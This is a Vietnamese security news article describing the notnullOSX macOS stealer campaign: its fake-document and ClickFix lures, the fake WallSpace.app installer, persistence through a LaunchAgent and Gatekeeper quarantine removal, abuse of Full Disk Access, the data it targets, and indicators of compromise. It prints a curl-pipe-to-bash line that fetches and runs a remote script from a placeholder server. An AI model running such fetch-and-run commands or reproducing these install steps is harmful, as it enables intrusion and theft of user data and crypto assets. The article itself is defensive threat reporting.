notnullOSX là một mối đe dọa mạng trên macOS được ghi nhận vào đầu năm 2026, nhắm vào người dùng Mac đang nắm giữ tài sản tiền mã hóa trị giá trên 10.000 USD. Đây là một chiến dịch tin tức bảo mật đáng chú ý vì được thiết kế để giả mạo hợp pháp ở mọi bước trong chuỗi lây nhiễm, từ phân phối, cài đặt cho tới duy trì hiện diện trên hệ thống.
Chuỗi phân phối của notnullOSX
Mẫu mã độc này được triển khai bằng kỹ thuật social engineering, kết hợp Google document giả mạo, website wallpaper giả và một kênh YouTube bị chiếm quyền. Theo ghi nhận ban đầu từ Moonlock Lab, các phát hiện đầu tiên của lỗ hổng CVE không liên quan; thay vào đó, đây là một chiến dịch phát tán mã độc độc lập, được quan sát vào ngày 30/03/2026 tại Việt Nam, Đài Loan và Tây Ban Nha.
Điểm đáng chú ý là kẻ vận hành không nhắm ngẫu nhiên. Trước khi nạn nhân bị tiếp cận, bảng điều khiển vận hành yêu cầu nhập thủ công địa chỉ ví, hồ sơ mạng xã hội và số dư ví. Các submission dưới ngưỡng 10.000 USD sẽ không được xử lý.
Phương thức lừa đảo ban đầu
Nạn nhân nhận được một tài liệu Google được gắn nhãn “protected”. Khi mở, giao diện hiển thị lỗi mã hóa giả, được quy cho một “Google API Connector” lỗi thời. Từ đây, người dùng được đưa tới hai lựa chọn khắc phục, nhưng cả hai đều dẫn tới cùng một payload.
- ClickFix: dán một lệnh Terminal để tải và cài đặt mã độc.
- WallSpace.app: file disk image giả mạo ứng dụng wallpaper động cho macOS.
Phân tích kỹ thuật: cách cài đặt trên macOS
Ở nhánh ClickFix, chuỗi tấn công dựa trên lệnh được mã hóa Base64, sau khi giải mã sẽ thực thi curl để tải một script bash từ máy chủ từ xa. Script này tiếp tục tải một file Mach-O, gán quyền thực thi, xóa cờ quarantine của Apple Gatekeeper và tạo LaunchAgent để tự khởi chạy khi hệ thống boot.
curl -fsSL <remote-server>/installer.sh | bashNạn nhân sau đó bị dẫn dắt bật Full Disk Access trong System Settings. Đây là bước then chốt vì quyền này cho phép mã độc vượt qua cơ chế TCC (Transparency, Consent, and Control) của macOS, vốn thường yêu cầu cấp quyền riêng cho Messages, Notes, Safari cookies và Contacts.
Ngay khi quyền truy cập đầy đủ được cấp, notnullOSX có thể đọc dữ liệu nhạy cảm mà không phát sinh cảnh báo riêng lẻ nào. Cách triển khai này làm giảm đáng kể khả năng phát hiện tấn công ở lớp người dùng.
Nhánh WallSpace.app
Với đường dẫn DMG, file WallSpace.app khi mount sẽ hiển thị ba thành phần: script cài đặt, file README và một shortcut mở Terminal. README hướng dẫn thao tác theo trình tự, còn shortcut tự động gọi Terminal từ volume đã mount.
Script cài đặt có kích thước gần 299 KB nhưng thực chất chỉ là lớp ngụy trang dạng văn bản. Khi giải mã, cùng một implant với nhánh ClickFix sẽ xuất hiện. Đây là một mô hình khai thác zero-day không phải trọng tâm; thay vào đó, chiến dịch tận dụng niềm tin của người dùng vào công cụ hệ thống và quy trình cài đặt quen thuộc.
Các khả năng thu thập dữ liệu của notnullOSX
Sau khi xâm nhập, notnullOSX hoạt động lặng lẽ và bền bỉ, tập trung vào trích xuất dữ liệu từ nhiều nguồn trên máy Mac. Cơ chế duy trì kết nối giúp kẻ điều khiển có thể gửi lệnh mới tới máy bị nhiễm sau khi xâm nhập ban đầu đã hoàn tất.
- iMessages
- Apple Notes
- Safari cookies
- Browser passwords
- Telegram sessions
- Ví tiền mã hóa: Bitcoin Core, Exodus, Electrum
ReplaceApp và mục tiêu ví phần cứng
Đặc biệt, module ReplaceApp có khả năng thay thế các ứng dụng ví phần cứng hợp pháp như Ledger Live bằng bản sao độc hại. Mục tiêu là chặn seed phrase trong quá trình thiết lập ví, một hành vi có thể dẫn tới rò rỉ dữ liệu nhạy cảm và mất toàn bộ tài sản số.
Hành vi này khiến mối đe dọa mạng trở nên nguy hiểm hơn vì không chỉ đánh cắp dữ liệu hiện có mà còn can thiệp vào quy trình khởi tạo ví mới. Trong bối cảnh đó, notnullOSX không cần kỹ thuật phức tạp để vượt qua cơ chế bảo vệ của macOS; thay vào đó, nó khai thác thao tác cấp quyền và cài đặt từ phía người dùng.
Đặc điểm mẫu mã độc và khả năng né phát hiện
Phân tích của Moonlock Lab cho thấy binary của notnullOSX là một file Mach-O đa kiến trúc dung lượng 27,74 MB, biên dịch cho cả Apple Silicon và Intel Mac. Tại thời điểm phát hiện, chỉ 10/64 engine trên VirusTotal nhận diện được mẫu này, phản ánh mức độ né phát hiện cao.
Chiến dịch cũng tận dụng một kênh YouTube bị chiếm quyền, được tạo từ năm 2015 và đạt khoảng 50.000 lượt xem trong hai tuần sau khi đăng một video duy nhất. Đây là dấu hiệu điển hình của việc tài khoản hợp pháp bị lạm dụng để phát tán mã độc ransomware và các biến thể stealer khác, dù trong trường hợp này payload là một macOS stealer nhắm vào ví tiền mã hóa.
IOC và dấu hiệu nhận diện
- Tên mã độc: notnullOSX
- Định dạng tải: Mach-O, multi-architecture
- Hành vi: tải script qua
curl, tạoLaunchAgent, xóa Gatekeeper quarantine flag - Quyền bị lạm dụng: Full Disk Access
- Dữ liệu bị nhắm tới: iMessages, Apple Notes, Safari cookies, mật khẩu trình duyệt, phiên Telegram, ví tiền mã hóa
- Ứng dụng bị giả mạo: WallSpace.app, Ledger Live clone
Tham chiếu kỹ thuật
Tham khảo thêm phân tích gốc từ Moonlock Lab tại đây: Moonlock Lab: notnullOSX stealer.
Đối chiếu hành vi của mẫu này với chỉ dẫn kiểm tra bảo mật macOS có thể thực hiện trên tài liệu chính thức của Apple về Full Disk Access và cơ chế TCC. Các đội ngũ an ninh nên ưu tiên rà soát cập nhật bản vá, quyền truy cập hệ thống và các launcher tự động khởi động để giảm nguy cơ xâm nhập trái phép.
